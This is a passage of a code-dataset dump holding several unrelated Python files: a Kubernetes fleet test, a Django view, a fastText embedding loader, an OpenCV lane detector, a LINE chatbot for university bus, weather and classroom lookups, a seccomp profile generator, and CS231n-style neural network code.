key.\r\nFILENAME = \"secret.txt\"\r\nwith open(FILENAME, \"r\") as file:\r\n API_KEY = file.readline()\r\n","repo_name":"flizzyflo/CurrencyChange","sub_path":"src/settings/Settings.py","file_name":"Settings.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25442472900","text":"from unittest.mock import MagicMock\nfrom unittest.mock import patch\n\nimport lobotomy\nfrom kuber.latest import core_v1\n\nfrom manager import _configs\nfrom manager import _controller\nfrom manager import _types\n\n\ndef _create_node(\n name: str,\n fleet: str,\n):\n \"\"\"Creates a node for mocked testing.\"\"\"\n node = core_v1.Node()\n with node.metadata as md:\n md.name = name\n md.labels.update(fleet=fleet)\n md.creation_timestamp = \"2018-01-01T00:00:00Z\"\n return node\n\n\n@lobotomy.patch()\n@patch(\"manager._controller.get_pods\")\n@patch(\"manager._controller._nodes.core_v1.Node.get_resource_api\")\ndef test_get_nodes(\n get_resource_api: MagicMock,\n get_pods: MagicMock,\n lobotomized: lobotomy.Lobotomy,\n):\n \"\"\"...\"\"\"\n get_pods.return_value = []\n api = MagicMock()\n api.list_node.return_value = MagicMock(\n items=[_create_node(\"a\", \"primary-small\"), _create_node(\"b\", \"primary-large\")]\n )\n 
get_resource_api.return_value = api\n\n configs = _types.ManagerConfigs()\n configs.fleets.append(\n _types.FleetRequirements(\n configs=configs,\n sector=\"primary\",\n size_spec=_types.SMALL_MEMORY_SPEC,\n )\n )\n\n fleet = _types.Fleet(configs.fleets[0], \"fleet-identifier\", 1, {})\n\n # Client for describing fleet instances that may not be in the\n # cluster at the moment.\n lobotomized.add_call(\n \"ec2\",\n \"describe_fleet_instances\",\n {\"ActiveInstances\": [{\"InstanceId\": \"a\"}, {\"InstanceId\": \"c\"}]},\n )\n lobotomized.add_call(\n \"ec2\",\n \"describe_instances\",\n {\n \"Reservations\": [\n {\n \"Instances\": [\n {\"PrivateDnsName\": \"c\", \"InstanceId\": \"c\"},\n {\"PrivateDnsName\": \"d\", \"InstanceId\": \"d\"},\n ]\n }\n ]\n },\n )\n\n nodes = _controller.get_nodes(configs, fleet)\n assert nodes[\"a\"].requirements.size == \"small\"\n assert \"b\" not in nodes, '\"b\" is not in the small fleet'\n assert nodes[\"c\"].state == _configs.WARMING_UP_STATE\n assert nodes[\"d\"].state == _configs.WARMING_UP_STATE\n","repo_name":"rocketboosters/kluster-fleet-manager","sub_path":"manager/tests/_controller/test_get_nodes.py","file_name":"test_get_nodes.py","file_ext":"py","file_size_in_byte":2177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3519155656","text":"from django.shortcuts import render\n\nfrom .models import Produkt\n\n# Create your views here.\n\n#CRUD\n\ndef product_list_view(request):\n produkt_object = Produkt.objects.all()\n context = {\n 'produkty' : produkt_object\n }\n return render(request, \"wyswietl/index.html\", context)","repo_name":"Damianoo00/Spizarnia","sub_path":"src/wyswietl/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70962632429","text":"import zipfile\nfrom pathlib import Path\n\nimport numpy as np\nimport requests\nfrom scipy import spatial\nfrom spacy.language import Language\nfrom tqdm import tqdm\n\n\"\"\"\nWe instantiate Embed as a Singleton to avoid the expensive operation of\nloading the model more than once. 
See:\nhttps://stackoverflow.com/questions/6760685/creating-a-singleton-in-python\n\"\"\"\nclass Singleton(type):\n    _instances = {}\n    def __call__(cls, *args, **kwargs):\n        if cls not in cls._instances:\n            cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs)\n        return cls._instances[cls]\n\nclass Embed(metaclass=Singleton):\n    def __init__(self) -> None:\n        WORD_VEC_DATA_SRC = \"https://dl.fbaipublicfiles.com/fasttext/vectors-english/crawl-300d-2M.vec.zip\"\n        CACHE_DIR = \"/tmp/embedding_cache\"\n        NLP_CACHE = \"/tmp/embedding_cache/nlp/\"\n\n        if Path(NLP_CACHE).exists():\n            print(\"Loading model from cache\", NLP_CACHE)\n            nlp = Language()\n            nlp.from_disk(NLP_CACHE)\n        else:\n            word_vec_data_cache = Path(CACHE_DIR) / Path(WORD_VEC_DATA_SRC).stem\n            word_vec_data_cache.parent.mkdir(parents=True, exist_ok=True)\n            word_vec_data_zipped = Path(\"/tmp/\") / Path(WORD_VEC_DATA_SRC).name\n            word_vec_data_zipped.parent.mkdir(parents=True, exist_ok=True)\n            # Download if not cached\n            if not word_vec_data_cache.exists():\n                print(f\"{word_vec_data_cache} does not exist.\\nDownloading from {WORD_VEC_DATA_SRC}\")\n                r = requests.get(WORD_VEC_DATA_SRC, stream=True)\n                with open(word_vec_data_zipped, 'wb') as f:\n                    total_length = int(r.headers.get('content-length'))\n                    for chunk in tqdm(r.iter_content(chunk_size=1024), total=(total_length/1024) + 1): \n                        if chunk:\n                            f.write(chunk)\n                            f.flush()\n                # Unzip\n                with zipfile.ZipFile(word_vec_data_zipped, 'r') as zip_ref:\n                    zip_ref.extractall(word_vec_data_cache.parent)\n            else:\n                print(f\"Using cached word vectors at {word_vec_data_cache}\")\n\n            # Use Spacy to load Vectors\n            nlp = Language()\n            print('[*] Loading Vectors with Spacy...')\n            with open(word_vec_data_cache, \"rb\") as f:\n                header = f.readline()\n                nr_row, nr_dim = header.split()\n                nlp.vocab.reset_vectors(width=int(nr_dim))\n                for line in tqdm(f, total=2000000):\n                    line = line.rstrip().decode(\"utf8\")\n                    pieces = line.rsplit(\" \", int(nr_dim))\n                    word = pieces[0]\n                    vector = np.asarray([float(v) for v in pieces[1:]], dtype=\"f\")\n                    nlp.vocab.set_vector(word, vector)\n            Path(NLP_CACHE).mkdir(parents=True, exist_ok=True)\n            nlp.to_disk(NLP_CACHE)\n        self.nlp = nlp\n\n    def get_embedding(self, string: str) -> np.array:\n        vec = self.nlp(string).vector\n        return vec / np.linalg.norm(vec)\n\n    def get_mean_embedding(self, strings: \"list[str]\") -> np.array:\n        # Embed each dataset example into a vector\n        embedding_vecs = []\n        for s in strings:\n            embedding_vecs.append(self.get_embedding(s))\n        embedding_vecs = np.array(embedding_vecs)\n        # print('Dataset Embedding Matrix Shape:', dataset_vecs.shape)\n        avg_vec = embedding_vecs.mean(0)\n        norm_avg_vec = avg_vec / np.linalg.norm(avg_vec)\n        # print('Unit-Normalized Average Embedding for Dataset Examples:', norm_avg_vec)\n        return norm_avg_vec\n\n    def get_cosine_distance(self, vec1, vec2):\n        return spatial.distance.cosine(vec1, vec2)\n\n    def show_sorted_distances(self, train_strings, candidate_strings, test_true_strings=[]):\n        class bcolors:\n            HEADER = '\\033[95m'\n            OKBLUE = '\\033[94m'\n            OKCYAN = '\\033[96m'\n            OKGREEN = '\\033[92m'\n            WARNING = '\\033[93m'\n            FAIL = '\\033[91m'\n            ENDC = '\\033[0m'\n            BOLD = '\\033[1m'\n            UNDERLINE = '\\033[4m'\n\n        query_vec = self.get_mean_embedding(train_strings)\n        test_strings = test_true_strings + candidate_strings\n        distances = []\n        # tstart = time.time()\n        for c in test_strings:\n            candidate_vec = self.get_embedding(c)\n            dist = self.get_cosine_distance(query_vec, candidate_vec)\n            distances.append(dist)\n        # time_per_embedding = (time.time() - tstart) / 
len(test_strings)\n        # print(f\"Embeddings took an average of {time_per_embedding}s ({len(test_strings)} samples)\")\n        print(\"Query sentences:\")\n        for d in train_strings:\n            print(bcolors.OKBLUE + d + bcolors.ENDC)\n        print(\"\")\n        print(\"Candidate sentences, sorted by cosine distance: (Blue are true examples)\")\n        for dist, text in sorted(zip(distances, test_strings)):\n            if text in test_true_strings:\n                print(bcolors.OKBLUE + f\"{dist:.4f}: {text}\" + bcolors.ENDC)\n            else:\n                print(f\"{dist:.4f}: {text}\")\n","repo_name":"JunShern/few-shot-pretraining","sub_path":"dataset/curator/embeddings.py","file_name":"embeddings.py","file_ext":"py","file_size_in_byte":5203,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
{"seq_id":"16597510637","text":"import cv2\nimport numpy as np\nimport pafy\n\n# 1\ncap = cv2.VideoCapture('/Users/kimjunho/Desktop/OpenCV_study/videos/lane_detect_ex2.mp4') # create the video capture object cap\nif (not cap.isOpened()):\n    print('Error opening video')\n\nret, src = cap.read()\nh, w, c= src.shape\nroi = np.zeros(src.shape, dtype=src.dtype)\nroi[h//2:h,:] = src[h//2:h,:]\nprint('frame.shape =', src.shape) #720 1280\nprint('roi.shape =', roi.shape) #480 640\n\ncv2.imshow('roi', roi)\n\nwhile True:\n    ret, frame = cap.read()\n    if not ret:\n        break\n    \n    # bottom half vertically, horizontal 1/3~2/3 \n    roi = np.zeros((h//2,w,3), dtype=src.dtype)\n    roi[:,:] = frame[h//2:h,:]\n    \n    gray = cv2.cvtColor(roi, cv2.COLOR_BGR2GRAY)\n    edges = cv2.Canny(gray, 180, 230)\n\n    lines = cv2.HoughLinesP(edges, rho=1, theta=np.pi/180.0, threshold=60)\n    \n    for line in lines:\n        x1, y1, x2, y2 = line[0]\n        cv2.line(frame, (x1,y1+h//2), (x2,y2+h//2), (0,0,255), 3)\n\n    cv2.imshow('frame', frame)\n    cv2.imshow('edges', edges)\n    \n    key = cv2.waitKey(20)\n    if key == 27:\n        break\n\nif cap.isOpened():\n    cap.release()\ncv2.waitKey()\ncv2.destroyAllWindows()","repo_name":"junho2000/opencv_python","sub_path":"test_project/lane_detect2.py","file_name":"lane_detect2.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"28536933072","text":"import os\nimport sys\nimport printer\nimport plotter\nimport tensorflow \t\t\tas \ttf\nimport numpy \t\t\t\tas \tnp\nimport matplotlib.pyplot \tas \tplt\nimport datetime\t\t\t\tas \ttime\nimport argumentparser\t\tas \tap\nimport filefinder\t\t\tas ff\nimport neuralnetwork\t\tas nn\nimport networktrainer\t\tas nt\nimport datagenerator \t\tas gen\nimport checkpointsaver\t\tas \tckps\nos.environ['TF_CPP_MIN_LOG_LEVEL']='2'\n\n#tf.set_random_seed(2)\n\nclass TFPotential :\n\tdef __init__(self) :\n\t\tself.argumentParser = ap.ArgumentParser(self)\n\t\tself.fileFinder \t= ff.FileFinder(self)\n\t\tself.inputs\t\t \t= 1\n\t\tself.nLayers \t \t= self.argumentParser.nLayers()\n\t\tself.nNodes \t \t= self.argumentParser.nNodes()\n\t\tself.outputs \t \t= 1\n\t\tself.networkType \t= self.argumentParser.type()\n\t\tself.network \t\t= nn.NeuralNetwork(self)\n\t\tself.network.constructNetwork(inputs\t\t= self.inputs, \n\t\t\t\t\t\t \t\t\t  nNodes\t\t= self.nNodes,\n\t\t\t\t\t\t \t\t\t  nLayers\t\t= self.nLayers, \n\t\t\t\t\t\t \t\t\t  outputs\t\t= self.outputs, \n\t\t\t\t\t\t \t\t\t  networkType\t= self.networkType) \n\t\tself.saver \t\t\t= ckps.CheckpointSaver(self, \n\t\t\t\t\t\t\t\t\t\t\t\t   self.argumentParser().save)\n\t\tself.networkTrainer = nt.NetworkTrainer(self, self.saver)\n\n\n\t\tself.function\t\t= lambda r: r/r*np.random.normal(0,1)# 
+np.sin(7.0*np.pi*r)\n\t\tself.function\t\t= lambda r: 1/r**12 - 1/r**6\n\t\tself.function\t\t= lambda r: 4*(1.0/(r**12) - 1.0/(r**6)) - 4*(1.0/(2.5**12) - 1.0/(2.5**6))\n\n\t\t\n\t\tself.dataGenerator\t= gen.DataGenerator(0.87, 2.5, self)\n\t\tself.dataGenerator.setFunction(self.function)\n\t\t\n\t\tif not self.argumentParser().file == None :\n\t\t\tself.dataGenerator.setGeneratorType(\"file\");\n\t\telse :\n\t\t\tself.dataGenerator.setGeneratorType(\"function\")\n\t\t#self.dataGenerator.setGeneratorType(\"VMC\")\n\t\t#self.dataGenerator.setGeneratorType(\"noise\")\n\t\t\n\t\t\n\t\t\n\t\t\n\t\tself.dataSize \t\t= int(9987)\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\tself.numberOfEpochs = int(100)\n\t\tself.batchSize\t\t= int(500)\n\t\tself.testSize\t\t= self.dataSize #int(600)\n\t\tself.testInterval\t= 5000\n\t\tself.printer\t\t= printer.Printer(self)\n\t\tself.printer.printSetup()\n\t\tself.plotter \t\t= plotter.Plotter(self)\n\n\n\tdef variableSummaries(self, name, variable) :\n\t\twith tf.name_scope('Summaries'):\n\n\t\t\tmean = tf.reduce_mean(variable)\n\t\t\ttf.summary.scalar('Mean/' + name, mean)\n\n\t\t\twith tf.name_scope('StandardDeviation'):\n\t\t\t\tstddev = tf.sqrt(tf.reduce_mean(tf.square(variable - mean)))\n\n\t\t\ttf.summary.scalar('StandardDeviation/' + name, stddev)\n\t\t\ttf.summary.scalar('Max/' + name, tf.reduce_max(variable))\n\t\t\ttf.summary.scalar('Min/' + name, tf.reduce_min(variable))\n\n\t\t\ttf.summary.histogram(name, variable) \n\n\tdef __call__(self, inputData, expectedOutput=None) :\n\t\tif expectedOutput == None :\n\t\t\texpectedOutput = inputData\n\t\treturn self.sess.run(self.networkTrainer.prediction, \n\t\t\t\t\t\t\t feed_dict={self.networkTrainer.x : inputData,\n\t\t\t\t\t\t\t\t\t   self.networkTrainer.y : expectedOutput})\n\n\tdef train(self, epochs=-1) :\n\t\tnumberOfEpochs = self.numberOfEpochs if epochs == -1 else epochs\n\t\tself.numberOfEpochs = numberOfEpochs\n\t\tself.networkTrainer.trainNetwork(numberOfEpochs)\n\t\tself.sess = self.networkTrainer.sess\n\n\tdef setNetworkType(self, typeString) :\n\t\tself.network.parseTypeString(typeString)\n\n\nif __name__ == \"__main__\" :\n\ttfpot = TFPotential()\n\t#tfpot.inputs = 2\n\t#tfpot.dataGenerator.a = 0.45\n\t#tfpot.dataGenerator.b = 1.8\n\t#tfpot.dataGenerator.generatorType = \"SW\"\n\ttfpot.train(tfpot.argumentParser().epochs)\n\t\n\t\n\t\n","repo_name":"mortele/TFPotential","sub_path":"tfpotential.py","file_name":"tfpotential.py","file_ext":"py","file_size_in_byte":3333,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
{"seq_id":"20716021756","text":"\r\nfrom cProfile import label\r\nfrom cgitb import text\r\nfrom flask import Flask, request, abort\r\nfrom waitress import serve\r\n\r\nfrom linebot import (\r\n    LineBotApi, WebhookHandler\r\n)\r\nfrom linebot.exceptions import (\r\n    LineBotApiError, InvalidSignatureError\r\n)\r\nfrom linebot.models import (\r\n    MessageEvent, TextMessage, TextSendMessage, FlexSendMessage, PostbackEvent,\r\n    QuickReplyButton, MessageAction, QuickReply, LocationAction, LocationMessage\r\n)\r\nimport os\r\nimport json\r\nfrom tenki import tenkii as tnk\r\nfrom tenki import weather2 as tnk2\r\nfrom basu import main as bus\r\nfrom support_center import yomikomi2 as sc\r\nfrom classroom.b import SerchClass\r\n\r\n\r\napp = Flask(__name__)\r\n\r\n# get environment variables\r\nYOUR_CHANNEL_ACCESS_TOKEN = os.environ[\"YOUR_CHANNEL_ACCESS_TOKEN\"]\r\nYOUR_CHANNEL_SECRET = os.environ[\"YOUR_CHANNEL_SECRET\"]\r\n\r\nline_bot_api = 
LineBotApi(YOUR_CHANNEL_ACCESS_TOKEN)\r\nhandler = WebhookHandler(YOUR_CHANNEL_SECRET)\r\n\r\nbus_select_data = [0,0,0] # bus selection stored as numbers [to/from school, bus type, period]\r\nbus_select_data_text = [\"\",\"\",\"\"] # bus selection stored as raw text [to/from school, bus type, period]\r\nperiods_dict = {\"go_home\":0, \"first_period\":1, \"second_period\":2, \"third_period\":3, \"fourth_period\":4, \"fifth_period\":5}\r\nsupport_list = [\"履修\", \"進路\", \"インターンシップ\", \"奨学金\", \"学費\", \"各種証明書\"]\r\nlocation_list =[\"京都女子大学\", \"現在地\"]\r\nsemester = [\"前期\",\"後期\"]\r\nsearch_bool = False\r\nsclass = SerchClass()\r\nsem_result = sclass.kyousitu(\"前期\")\r\n# f = open('bus_option.json', 'r')\r\n# flex_message_json_dict = json.load(f)\r\n# print(flex_message_json_dict)\r\n\r\n\r\n@app.route(\"/callback\", methods=['POST'])\r\ndef callback():\r\n    # get X-Line-Signature header value\r\n    signature = request.headers['X-Line-Signature']\r\n\r\n    # get request body as text\r\n    body = request.get_data(as_text=True)\r\n    app.logger.info(\"Request body: \" + body)\r\n\r\n    # handle webhook body\r\n    try:\r\n        handler.handle(body, signature)\r\n    except InvalidSignatureError:\r\n        abort(400)\r\n\r\n    return 'OK'\r\n\r\n# @handler.add acts as a decorator (it adds behavior to an existing function without modifying it)\r\n# handler that runs when a text message is received\r\n@handler.add(MessageEvent, message=TextMessage)\r\ndef handle_message(event):\r\n    print(\"受け取ったよ!\")\r\n    result_contents = TextSendMessage(text=event.message.text)\r\n    \r\n    global search_bool\r\n    global sem_result\r\n    print(event)\r\n\r\n    # classroom search mode\r\n    if search_bool:\r\n        print(\"bool値Trueです!!\")\r\n        if event.message.text in semester:\r\n            print(sem_result)\r\n            sem_result = sclass.kyousitu(event.message.text)\r\n            result_contents = [\r\n                TextSendMessage(text = f\"{event.message.text}ですね!\"),\r\n                TextSendMessage(text = \"続いて調べたい教科のキーワードを入力してください\")\r\n            ]\r\n            print(sem_result) \r\n        else:\r\n            classroom = sclass.kyousitu(event.message.text, sem_result)\r\n            print(classroom)\r\n            result_contents = TextSendMessage(text = classroom)\r\n            search_bool = False\r\n    \r\n    # classroom search\r\n    if event.message.text == \"教室\":\r\n        items = [QuickReplyButton(action=MessageAction(label=f\"{sem}\", text=f\"{sem}\")) for sem in semester]\r\n        result_contents = [\r\n            FlexSendMessage(alt_text='教室検索モード', contents = openJsonFile('json/modeexp.json')),\r\n            TextSendMessage(text = \"学期を選択してください\", quick_reply=QuickReply(items=items))\r\n        ]\r\n        print(\"教科名を入力してください\")\r\n        search_bool = True\r\n        print(search_bool) \r\n\r\n    # weather\r\n    if event.message.text == \"天気\":\r\n        items = [QuickReplyButton(action=MessageAction(label=f\"{loc}\", text=f\"{loc}の天気\")) for loc in location_list]\r\n        result_contents = [TextSendMessage(text = \"知りたい場所を選んでください\",quick_reply=QuickReply(items=items))]\r\n\r\n    if event.message.text == \"京都女子大学の天気\":\r\n        weather = tnk2.get_weather_from_location('605-8501')\r\n        print(weather)\r\n        result_contents = TextSendMessage(text=weather)\r\n        # sendMessage(event, \"text\", weather)\r\n    \r\n    if event.message.text == \"現在地の天気\":\r\n        items=[QuickReplyButton(action=LocationAction(label=\"Location\"))]\r\n        result_contents = [TextSendMessage(text=\"位置情報ください\",quick_reply=QuickReply(items=items))]\r\n\r\n\r\n\r\n\r\n    if event.message.text == \"バスの時刻\":\r\n        result_contents = FlexSendMessage(\r\n            alt_text='利用バス選択',\r\n            # pass a dict value to the contents parameter\r\n            contents=openJsonFile('json/bus_option.json')\r\n        )\r\n\r\n    \r\n\r\n    if event.message.text == \"大学生活に関する窓口\":\r\n        items = [QuickReplyButton(action=MessageAction(label=f\"{support}\", text=f\"{support}\")) for support in support_list]\r\n        result_contents = [\r\n            TextSendMessage(text=\"進路 
履修 インターンシップ 奨学金 各種証明書に関する対応窓口に関する情報を教えます!\"),\r\n TextSendMessage(text=\"知りたいことは何ですか?\", quick_reply=QuickReply(items=items))\r\n ]\r\n\r\n\r\n # ユーザーが送ったメッセージがsupport_listに含まれていたら反応する\r\n if event.message.text in support_list:\r\n result_contents = [\r\n TextSendMessage(text = f\"{event.message.text}の情報はこちらになります!\"),\r\n TextSendMessage(text = sc.center(event.message.text))\r\n ]\r\n\r\n if event.message.text == \"テスト\":\r\n items = [QuickReplyButton(action=MessageAction(label=f\"{support}\", text=f\"{support}\")) for support in support_list]\r\n result_contents = TextSendMessage(text=\"どの言語が好きですか?\",quick_reply=QuickReply(items=items))\r\n \r\n if event.message.text == \"位置情報\":\r\n items=[QuickReplyButton(action=LocationAction(label=\"Location\"))]\r\n result_contents = [TextSendMessage(text=\"位置情報ください\",quick_reply=QuickReply(items=items))]\r\n\r\n line_bot_api.reply_message(event.reply_token,result_contents)\r\n print(\"完了\")\r\n\r\n\r\n# ボタン押したときに動く関数\r\n@handler.add(PostbackEvent)\r\ndef on_postback(event):\r\n\r\n result_contents = TextSendMessage(text=\"hello\")\r\n print(event)\r\n if event.postback.data == \"princess_line_bus\":\r\n print(event.postback.data)\r\n result_contents = [\r\n TextSendMessage(alt_text='princess_line_bus',text = \"プリンセスラインバスですね!\"),\r\n FlexSendMessage(alt_text='バス利用目的', contents = openJsonFile('json/bus_purpose.json'))\r\n ]\r\n bus_select_data[1] = 2\r\n bus_select_data_text[1] = \"プリンセスラインバス\"\r\n\r\n if event.postback.data == \"municipal_bus\":\r\n print(event.postback.data)\r\n result_contents = [\r\n TextSendMessage(alt_text='municipal_bus',text = \"市バスですね!\"),\r\n FlexSendMessage(alt_text='バス利用目的', contents = openJsonFile('json/bus_purpose.json'))\r\n ]\r\n bus_select_data[1] = 1\r\n bus_select_data_text[1] = \"市バス\"\r\n \r\n # periods_dict = {\"first_period\":1, \"second_period\":2, \"third_period\":3, \"fourth_period\":4, \"fifth_period\":5}\r\n # 上のdictのキーと押されたボタンのデータが一緒の時の結果をresult_contentsに代入\r\n if event.postback.data in periods_dict:\r\n bus_result = whatPeriod(event.postback.data)\r\n print(bus_result)\r\n result_contents = [TextSendMessage(text = bus_result[0]),TextSendMessage(text = bus_result[1])]\r\n\r\n \r\n print(bus_select_data)\r\n print(bus_select_data_text)\r\n line_bot_api.reply_message(event.reply_token,result_contents)\r\n\r\n#位置情報を受け取った時\r\n@handler.add(MessageEvent, message=LocationMessage)\r\ndef handle_location(event):\r\n weather2 = tnk2.get_weather_from_location(event.message.address)\r\n print(weather2)\r\n result_contents = [\r\n TextSendMessage(text=\"ありがとう、愛してるよ\"),\r\n TextSendMessage(text=f\"住所は{event.message.address}なんだね\"),\r\n TextSendMessage(text=weather2)\r\n ]\r\n print(event)\r\n line_bot_api.reply_message(event.reply_token,result_contents)\r\n\r\n\r\n# FlexMessageの用意\r\n# ファイルを読み込んだ変数を返す関数\r\ndef openJsonFile(filename):\r\n with open(filename) as f:\r\n print(\"ロード中\")\r\n flex_message_json_dict = json.load(f)\r\n print(flex_message_json_dict)\r\n return flex_message_json_dict\r\n\r\n# 登下校のボタンからデータ受け取ってバスの関数を回して結果のテキストと時間を返す\r\n# periodにはperiods_dictのキーが入る\r\ndef whatPeriod(period):\r\n if period != \"go_home\":\r\n # 登校、何限かをbus_select_dataに代入\r\n bus_select_data[0], bus_select_data[2] = 1, periods_dict[period]\r\n # 選んだ結果確認用テキストをbus_select_data_textに代入\r\n bus_select_data_text[0], bus_select_data_text[2] = \"登校\", periods_dict[period]\r\n # result_textに選択の最終確認のテキスト代入\r\n result_text = f\"「{bus_select_data_text[1]}で{bus_select_data_text[2]}限に{bus_select_data_text[0]}」ですね!\"\r\n \r\n\r\n \r\n else:\r\n 
bus_select_data[0], bus_select_data[2] = 2, periods_dict[period]\r\n bus_select_data_text[0] = \"下校\"\r\n result_text = f\"「{bus_select_data_text[1]}で{bus_select_data_text[0]}」ですね!\"\r\n\r\n\r\n print(bus_select_data)\r\n print(bus_select_data_text)\r\n print(result_text)\r\n # bus_tmpにBusTimeのインスタンス化、resultに関数の結果代入\r\n bus_tmp = bus.BusTime(bus_select_data[0],bus_select_data[1],bus_select_data[2])\r\n bus_result = bus_tmp.bus()\r\n return result_text, bus_result\r\n\r\n\r\n\r\n \r\n\r\nif __name__ == \"__main__\":\r\n# app.run()\r\n port = int(os.getenv(\"PORT\", 5000))\r\n # app.run(host=\"0.0.0.0\", port=port)\r\n serve(app, host=\"0.0.0.0\",port = port)","repo_name":"Miyai75/kwu_linebot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13075531460","text":"import json\nimport sys\nimport subprocess\n\nsyscalls = set()\nwith open(sys.argv[1], 'r') as f:\n for line in f.readlines():\n syscalls.add(line.strip())\n\nfoo = {\n \"defaultAction\": \"SCMP_ACT_ERRNO\",\n \"architectures\": [\n \"SCMP_ARCH_X86_64\",\n \"SCMP_ARCH_X86\",\n \"SCMP_ARCH_X32\"\n ],\n \"syscalls\": []\n}\n\nfor i in syscalls:\n item = {\n \"name\": i,\n \"action\": \"SCMP_ACT_ALLOW\",\n \"args\": []\n }\n\n foo['syscalls'].append(item)\n with open(sys.argv[2], 'w') as f:\n f.write(json.dumps(foo, indent=2))\n","repo_name":"tuxx42/lnd-with-seccomp","sub_path":"scripts/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30059720614","text":"import numpy as np\n\nfrom .layers import *\nfrom .layer_utils import *\n\n\"\"\" \nThis code was originally written for CS 231n at Stanford University\n(cs231n.stanford.edu). It has been modified in various areas for use in the\nECE 239AS class at UCLA. This includes the descriptions of what code to\nimplement as well as some slight potential changes in variable names to be\nconsistent with class nomenclature. We thank Justin Johnson & Serena Yeung for\npermission to use this code. To see the original version, please visit\ncs231n.stanford.edu. \n\"\"\"\n\nclass TwoLayerNet(object):\n \"\"\"\n A two-layer fully-connected neural network with ReLU nonlinearity and\n softmax loss that uses a modular layer design. 
We assume an input dimension\n of D, a hidden dimension of H, and perform classification over C classes.\n \n The architecure should be affine - relu - affine - softmax.\n\n Note that this class does not implement gradient descent; instead, it\n will interact with a separate Solver object that is responsible for running\n optimization.\n\n The learnable parameters of the model are stored in the dictionary\n self.params that maps parameter names to numpy arrays.\n \"\"\"\n \n def __init__(self, input_dim=3*32*32, hidden_dims=100, num_classes=10,\n dropout=0, weight_scale=1e-3, reg=0.0):\n \"\"\"\n Initialize a new network.\n\n Inputs:\n - input_dim: An integer giving the size of the input\n - hidden_dims: An integer giving the size of the hidden layer\n - num_classes: An integer giving the number of classes to classify\n - dropout: Scalar between 0 and 1 giving dropout strength.\n - weight_scale: Scalar giving the standard deviation for random\n initialization of the weights.\n - reg: Scalar giving L2 regularization strength.\n \"\"\"\n self.params = {}\n self.reg = reg\n \n # ================================================================ #\n # YOUR CODE HERE:\n # Initialize W1, W2, b1, and b2. Store these as self.params['W1'], \n # self.params['W2'], self.params['b1'] and self.params['b2']. The\n # biases are initialized to zero and the weights are initialized\n # so that each parameter has mean 0 and standard deviation weight_scale.\n # The dimensions of W1 should be (input_dim, hidden_dim) and the\n # dimensions of W2 should be (hidden_dims, num_classes)\n # ================================================================ #\n\n self.params['W1'] = np.random.randn(input_dim, hidden_dims) * weight_scale\n self.params['W2'] = np.random.randn(hidden_dims, num_classes) * weight_scale\n self.params['b1'] = np.zeros((hidden_dims, 1))\n self.params['b2'] = np.zeros((num_classes, 1))\n\n # ================================================================ #\n # END YOUR CODE HERE\n # ================================================================ #\n\n def loss(self, X, y=None):\n \"\"\"\n Compute loss and gradient for a minibatch of data.\n\n Inputs:\n - X: Array of input data of shape (N, d_1, ..., d_k)\n - y: Array of labels, of shape (N,). y[i] gives the label for X[i].\n\n Returns:\n If y is None, then run a test-time forward pass of the model and return:\n - scores: Array of shape (N, C) giving classification scores, where\n scores[i, c] is the classification score for X[i] and class c.\n\n If y is not None, then run a training-time forward and backward pass and\n return a tuple of:\n - loss: Scalar value giving the loss\n - grads: Dictionary with the same keys as self.params, mapping parameter\n names to gradients of the loss with respect to those parameters.\n \"\"\" \n scores = None\n\n # ================================================================ #\n # YOUR CODE HERE:\n # Implement the forward pass of the two-layer neural network. Store\n # the class scores as the variable 'scores'. 
Be sure to use the layers\n # you prior implemented.\n # ================================================================ # \n\n out1, cache1 = affine_forward(X, self.params['W1'], self.params['b1']) \n out2, cache2 = relu_forward(out1)\n scores, cache3 = affine_forward(out2, self.params['W2'], self.params['b2']) \n\n # ================================================================ #\n # END YOUR CODE HERE\n # ================================================================ #\n \n # If y is None then we are in test mode so just return scores\n if y is None:\n return scores\n \n loss, grads = 0, {}\n # ================================================================ #\n # YOUR CODE HERE:\n # Implement the backward pass of the two-layer neural net. Store\n # the loss as the variable 'loss' and store the gradients in the \n # 'grads' dictionary. For the grads dictionary, grads['W1'] holds\n # the gradient for W1, grads['b1'] holds the gradient for b1, etc.\n # i.e., grads[k] holds the gradient for self.params[k].\n #\n # Add L2 regularization, where there is an added cost 0.5*self.reg*W^2\n # for each W. Be sure to include the 0.5 multiplying factor to \n # match our implementation.\n #\n # And be sure to use the layers you prior implemented.\n # ================================================================ # \n\n loss, dx = softmax_loss(scores, y)\n loss += 0.5 * self.reg * (np.linalg.norm(self.params['W1'], 'fro')**2 + np.linalg.norm(self.params['W2'], 'fro')**2)\n\n dh1, dW2, db2 = affine_backward(dx, cache3)\n da1 = relu_backward(dh1, cache2)\n dx2, dW1, db1 = affine_backward(da1, cache1)\n\n grads['W1'] = dW1 + self.reg * self.params['W1']\n grads['b1'] = db1.T\n grads['W2'] = dW2 + self.reg * self.params['W2']\n grads['b2'] = db2.T\n\n # ================================================================ #\n # END YOUR CODE HERE\n # ================================================================ #\n \n return loss, grads\n\n\nclass FullyConnectedNet(object):\n \"\"\"\n A fully-connected neural network with an arbitrary number of hidden layers,\n ReLU nonlinearities, and a softmax loss function. This will also implement\n dropout and batch normalization as options. For a network with L layers,\n the architecture will be\n \n {affine - [batch norm] - relu - [dropout]} x (L - 1) - affine - softmax\n \n where batch normalization and dropout are optional, and the {...} block is\n repeated L - 1 times.\n \n Similar to the TwoLayerNet above, learnable parameters are stored in the\n self.params dictionary and will be learned using the Solver class.\n \"\"\"\n\n 